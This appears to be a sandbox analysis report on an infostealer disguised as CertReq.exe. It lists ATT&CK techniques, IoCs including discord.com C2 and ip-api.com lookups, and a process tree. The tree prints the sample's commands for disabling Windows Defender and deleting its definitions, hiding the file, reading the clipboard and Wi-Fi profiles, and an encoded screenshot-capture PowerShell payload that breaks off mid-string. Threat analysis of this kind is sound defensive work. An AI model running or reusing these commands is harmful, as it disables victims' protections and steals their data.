74d22af19aadd2c8815ae14d2d5f6cc93c21259e16248902237649af1b52e0d0

Analysis

max time kernel
94s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2025, 19:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CertReq.exe
Size

6.1MB
MD5

14fa9c4afae8b74cbd549f5a1cde0ee8
SHA1

04b7fbd26e03f716b77c9515d9764598921c642b
SHA256

74d22af19aadd2c8815ae14d2d5f6cc93c21259e16248902237649af1b52e0d0
SHA512

c70ef4ad961368bb800c8d0b1a19275e46a0bd996e6164d3f606abb23518e46f2d249ae11f66f9a9b4b64132b4cd71425325f47e2492703d84204affee1e78bf
SSDEEP

196608:hgwYQHceNtx+yAiWfR0FHpdot7sl5nH+7YRb:+w777QfR0xpWsTH+7qb

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4656	powershell.exe
2396	powershell.exe
4764	powershell.exe
1516	powershell.exe
1148	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	CertReq.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3880	powershell.exe
628	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
836	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe
2468	CertReq.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	discord.com
31	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
28	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5068	tasklist.exe
4772	tasklist.exe
3604	tasklist.exe
4252	tasklist.exe
3448	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1632	cmd.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c96-21.dat	upx
behavioral2/memory/2468-25-0x00007FF978770000-0x00007FF978BDF000-memory.dmp	upx
behavioral2/files/0x0007000000023c89-27.dat	upx
behavioral2/files/0x0007000000023c94-29.dat	upx
behavioral2/files/0x0007000000023c8f-46.dat	upx
behavioral2/memory/2468-48-0x00007FF98F4E0000-0x00007FF98F4EF000-memory.dmp	upx
behavioral2/files/0x0007000000023c90-47.dat	upx
behavioral2/files/0x0007000000023c8e-45.dat	upx
behavioral2/files/0x0007000000023c8c-43.dat	upx
behavioral2/files/0x0007000000023c8b-42.dat	upx
behavioral2/files/0x0007000000023c8a-41.dat	upx
behavioral2/files/0x0007000000023c88-40.dat	upx
behavioral2/files/0x0007000000023c9b-39.dat	upx
behavioral2/files/0x0007000000023c9a-38.dat	upx
behavioral2/files/0x0007000000023c99-37.dat	upx
behavioral2/files/0x0007000000023c95-34.dat	upx
behavioral2/files/0x0007000000023c93-33.dat	upx
behavioral2/files/0x0007000000023c8d-44.dat	upx
behavioral2/memory/2468-30-0x00007FF98C750000-0x00007FF98C774000-memory.dmp	upx
behavioral2/memory/2468-54-0x00007FF98B4B0000-0x00007FF98B4DD000-memory.dmp	upx
behavioral2/memory/2468-56-0x00007FF98CF70000-0x00007FF98CF89000-memory.dmp	upx
behavioral2/memory/2468-58-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp	upx
behavioral2/memory/2468-60-0x00007FF987900000-0x00007FF987A69000-memory.dmp	upx
behavioral2/memory/2468-62-0x00007FF98C680000-0x00007FF98C699000-memory.dmp	upx
behavioral2/memory/2468-64-0x00007FF98B810000-0x00007FF98B81D000-memory.dmp	upx
behavioral2/memory/2468-66-0x00007FF988100000-0x00007FF98812E000-memory.dmp	upx
behavioral2/memory/2468-74-0x00007FF98C750000-0x00007FF98C774000-memory.dmp	upx
behavioral2/memory/2468-73-0x00007FF977E10000-0x00007FF978185000-memory.dmp	upx
behavioral2/memory/2468-71-0x00007FF987760000-0x00007FF987818000-memory.dmp	upx
behavioral2/memory/2468-70-0x00007FF978770000-0x00007FF978BDF000-memory.dmp	upx
behavioral2/memory/2468-76-0x00007FF98B3B0000-0x00007FF98B3C4000-memory.dmp	upx
behavioral2/memory/2468-79-0x00007FF98B7E0000-0x00007FF98B7ED000-memory.dmp	upx
behavioral2/memory/2468-78-0x00007FF98B4B0000-0x00007FF98B4DD000-memory.dmp	upx
behavioral2/memory/2468-82-0x00007FF978260000-0x00007FF978378000-memory.dmp	upx
behavioral2/memory/2468-81-0x00007FF98CF70000-0x00007FF98CF89000-memory.dmp	upx
behavioral2/memory/2468-108-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp	upx
behavioral2/memory/2468-122-0x00007FF987900000-0x00007FF987A69000-memory.dmp	upx
behavioral2/memory/2468-242-0x00007FF98C680000-0x00007FF98C699000-memory.dmp	upx
behavioral2/memory/2468-282-0x00007FF988100000-0x00007FF98812E000-memory.dmp	upx
behavioral2/memory/2468-298-0x00007FF987760000-0x00007FF987818000-memory.dmp	upx
behavioral2/memory/2468-301-0x00007FF977E10000-0x00007FF978185000-memory.dmp	upx
behavioral2/memory/2468-335-0x00007FF978260000-0x00007FF978378000-memory.dmp	upx
behavioral2/memory/2468-327-0x00007FF987900000-0x00007FF987A69000-memory.dmp	upx
behavioral2/memory/2468-326-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp	upx
behavioral2/memory/2468-321-0x00007FF978770000-0x00007FF978BDF000-memory.dmp	upx
behavioral2/memory/2468-322-0x00007FF98C750000-0x00007FF98C774000-memory.dmp	upx
behavioral2/memory/2468-337-0x00007FF978770000-0x00007FF978BDF000-memory.dmp	upx
behavioral2/memory/2468-365-0x00007FF978260000-0x00007FF978378000-memory.dmp	upx
behavioral2/memory/2468-364-0x00007FF98B7E0000-0x00007FF98B7ED000-memory.dmp	upx
behavioral2/memory/2468-363-0x00007FF98B3B0000-0x00007FF98B3C4000-memory.dmp	upx
behavioral2/memory/2468-362-0x00007FF987760000-0x00007FF987818000-memory.dmp	upx
behavioral2/memory/2468-361-0x00007FF988100000-0x00007FF98812E000-memory.dmp	upx
behavioral2/memory/2468-360-0x00007FF98B810000-0x00007FF98B81D000-memory.dmp	upx
behavioral2/memory/2468-359-0x00007FF98C680000-0x00007FF98C699000-memory.dmp	upx
behavioral2/memory/2468-358-0x00007FF987900000-0x00007FF987A69000-memory.dmp	upx
behavioral2/memory/2468-357-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp	upx
behavioral2/memory/2468-356-0x00007FF98CF70000-0x00007FF98CF89000-memory.dmp	upx
behavioral2/memory/2468-355-0x00007FF98B4B0000-0x00007FF98B4DD000-memory.dmp	upx
behavioral2/memory/2468-354-0x00007FF98F4E0000-0x00007FF98F4EF000-memory.dmp	upx
behavioral2/memory/2468-353-0x00007FF98C750000-0x00007FF98C774000-memory.dmp	upx
behavioral2/memory/2468-352-0x00007FF977E10000-0x00007FF978185000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3216	cmd.exe
3088	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3420	cmd.exe
2464	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1020	WMIC.exe
3460	WMIC.exe
3192	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1960	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3088	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4764	powershell.exe
4656	powershell.exe
4656	powershell.exe
4764	powershell.exe
4764	powershell.exe
4656	powershell.exe
2396	powershell.exe
2396	powershell.exe
3880	powershell.exe
3880	powershell.exe
3196	powershell.exe
3196	powershell.exe
3880	powershell.exe
3196	powershell.exe
1516	powershell.exe
1516	powershell.exe
1192	powershell.exe
1192	powershell.exe
1148	powershell.exe
1148	powershell.exe
3464	powershell.exe
3464	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4772	tasklist.exe
Token: SeIncreaseQuotaPrivilege	712	WMIC.exe
Token: SeSecurityPrivilege	712	WMIC.exe
Token: SeTakeOwnershipPrivilege	712	WMIC.exe
Token: SeLoadDriverPrivilege	712	WMIC.exe
Token: SeSystemProfilePrivilege	712	WMIC.exe
Token: SeSystemtimePrivilege	712	WMIC.exe
Token: SeProfSingleProcessPrivilege	712	WMIC.exe
Token: SeIncBasePriorityPrivilege	712	WMIC.exe
Token: SeCreatePagefilePrivilege	712	WMIC.exe
Token: SeBackupPrivilege	712	WMIC.exe
Token: SeRestorePrivilege	712	WMIC.exe
Token: SeShutdownPrivilege	712	WMIC.exe
Token: SeDebugPrivilege	712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	712	WMIC.exe
Token: SeRemoteShutdownPrivilege	712	WMIC.exe
Token: SeUndockPrivilege	712	WMIC.exe
Token: SeManageVolumePrivilege	712	WMIC.exe
Token: 33	712	WMIC.exe
Token: 34	712	WMIC.exe
Token: 35	712	WMIC.exe
Token: 36	712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	712	WMIC.exe
Token: SeSecurityPrivilege	712	WMIC.exe
Token: SeTakeOwnershipPrivilege	712	WMIC.exe
Token: SeLoadDriverPrivilege	712	WMIC.exe
Token: SeSystemProfilePrivilege	712	WMIC.exe
Token: SeSystemtimePrivilege	712	WMIC.exe
Token: SeProfSingleProcessPrivilege	712	WMIC.exe
Token: SeIncBasePriorityPrivilege	712	WMIC.exe
Token: SeCreatePagefilePrivilege	712	WMIC.exe
Token: SeBackupPrivilege	712	WMIC.exe
Token: SeRestorePrivilege	712	WMIC.exe
Token: SeShutdownPrivilege	712	WMIC.exe
Token: SeDebugPrivilege	712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	712	WMIC.exe
Token: SeRemoteShutdownPrivilege	712	WMIC.exe
Token: SeUndockPrivilege	712	WMIC.exe
Token: SeManageVolumePrivilege	712	WMIC.exe
Token: 33	712	WMIC.exe
Token: 34	712	WMIC.exe
Token: 35	712	WMIC.exe
Token: 36	712	WMIC.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	WMIC.exe
Token: SeSecurityPrivilege	1020	WMIC.exe
Token: SeTakeOwnershipPrivilege	1020	WMIC.exe
Token: SeLoadDriverPrivilege	1020	WMIC.exe
Token: SeSystemProfilePrivilege	1020	WMIC.exe
Token: SeSystemtimePrivilege	1020	WMIC.exe
Token: SeProfSingleProcessPrivilege	1020	WMIC.exe
Token: SeIncBasePriorityPrivilege	1020	WMIC.exe
Token: SeCreatePagefilePrivilege	1020	WMIC.exe
Token: SeBackupPrivilege	1020	WMIC.exe
Token: SeRestorePrivilege	1020	WMIC.exe
Token: SeShutdownPrivilege	1020	WMIC.exe
Token: SeDebugPrivilege	1020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1020	WMIC.exe
Token: SeRemoteShutdownPrivilege	1020	WMIC.exe
Token: SeUndockPrivilege	1020	WMIC.exe
Token: SeManageVolumePrivilege	1020	WMIC.exe
Token: 33	1020	WMIC.exe
Token: 34	1020	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 876 wrote to memory of 2468	876	CertReq.exe	84
PID 876 wrote to memory of 2468	876	CertReq.exe	84
PID 2468 wrote to memory of 4644	2468	CertReq.exe	88
PID 2468 wrote to memory of 4644	2468	CertReq.exe	88
PID 2468 wrote to memory of 5088	2468	CertReq.exe	89
PID 2468 wrote to memory of 5088	2468	CertReq.exe	89
PID 2468 wrote to memory of 1428	2468	CertReq.exe	90
PID 2468 wrote to memory of 1428	2468	CertReq.exe	90
PID 2468 wrote to memory of 1280	2468	CertReq.exe	93
PID 2468 wrote to memory of 1280	2468	CertReq.exe	93
PID 1280 wrote to memory of 4772	1280	cmd.exe	95
PID 1280 wrote to memory of 4772	1280	cmd.exe	95
PID 2468 wrote to memory of 1288	2468	CertReq.exe	96
PID 2468 wrote to memory of 1288	2468	CertReq.exe	96
PID 1288 wrote to memory of 712	1288	cmd.exe	97
PID 1288 wrote to memory of 712	1288	cmd.exe	97
PID 4644 wrote to memory of 4656	4644	cmd.exe	100
PID 4644 wrote to memory of 4656	4644	cmd.exe	100
PID 1428 wrote to memory of 1144	1428	cmd.exe	99
PID 1428 wrote to memory of 1144	1428	cmd.exe	99
PID 5088 wrote to memory of 4764	5088	cmd.exe	101
PID 5088 wrote to memory of 4764	5088	cmd.exe	101
PID 2468 wrote to memory of 1784	2468	CertReq.exe	102
PID 2468 wrote to memory of 1784	2468	CertReq.exe	102
PID 1784 wrote to memory of 4552	1784	cmd.exe	103
PID 1784 wrote to memory of 4552	1784	cmd.exe	103
PID 2468 wrote to memory of 1848	2468	CertReq.exe	104
PID 2468 wrote to memory of 1848	2468	CertReq.exe	104
PID 1848 wrote to memory of 1252	1848	cmd.exe	105
PID 1848 wrote to memory of 1252	1848	cmd.exe	105
PID 2468 wrote to memory of 2568	2468	CertReq.exe	106
PID 2468 wrote to memory of 2568	2468	CertReq.exe	106
PID 2568 wrote to memory of 1020	2568	cmd.exe	107
PID 2568 wrote to memory of 1020	2568	cmd.exe	107
PID 2468 wrote to memory of 3660	2468	CertReq.exe	108
PID 2468 wrote to memory of 3660	2468	CertReq.exe	108
PID 3660 wrote to memory of 3460	3660	cmd.exe	144
PID 3660 wrote to memory of 3460	3660	cmd.exe	144
PID 2468 wrote to memory of 1632	2468	CertReq.exe	110
PID 2468 wrote to memory of 1632	2468	CertReq.exe	110
PID 2468 wrote to memory of 4892	2468	CertReq.exe	111
PID 2468 wrote to memory of 4892	2468	CertReq.exe	111
PID 1632 wrote to memory of 1152	1632	cmd.exe	114
PID 1632 wrote to memory of 1152	1632	cmd.exe	114
PID 4892 wrote to memory of 2396	4892	cmd.exe	115
PID 4892 wrote to memory of 2396	4892	cmd.exe	115
PID 2468 wrote to memory of 3408	2468	CertReq.exe	116
PID 2468 wrote to memory of 3408	2468	CertReq.exe	116
PID 2468 wrote to memory of 4368	2468	CertReq.exe	117
PID 2468 wrote to memory of 4368	2468	CertReq.exe	117
PID 4368 wrote to memory of 3604	4368	cmd.exe	119
PID 4368 wrote to memory of 3604	4368	cmd.exe	119
PID 2468 wrote to memory of 4908	2468	CertReq.exe	120
PID 2468 wrote to memory of 4908	2468	CertReq.exe	120
PID 4908 wrote to memory of 3492	4908	cmd.exe	121
PID 4908 wrote to memory of 3492	4908	cmd.exe	121
PID 2468 wrote to memory of 628	2468	CertReq.exe	122
PID 2468 wrote to memory of 628	2468	CertReq.exe	122
PID 2468 wrote to memory of 4324	2468	CertReq.exe	123
PID 2468 wrote to memory of 4324	2468	CertReq.exe	123
PID 2468 wrote to memory of 2240	2468	CertReq.exe	124
PID 2468 wrote to memory of 2240	2468	CertReq.exe	124
PID 4324 wrote to memory of 3448	4324	cmd.exe	125
PID 4324 wrote to memory of 3448	4324	cmd.exe	125

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
440	attrib.exe
1152	attrib.exe
1596	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CertReq.exe
"C:\Users\Admin\AppData\Local\Temp\CertReq.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:876
- C:\Users\Admin\AppData\Local\Temp\CertReq.exe
  "C:\Users\Admin\AppData\Local\Temp\CertReq.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CertReq.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CertReq.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Deactivated Antimalware !', 0, 'Info', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1428
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Deactivated Antimalware !', 0, 'Info', 32+16);close()"
      4⤵
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CertReq.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CertReq.exe"
      4⤵
      Views/modifies file attributes
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2240
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3420
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:228
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3940
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA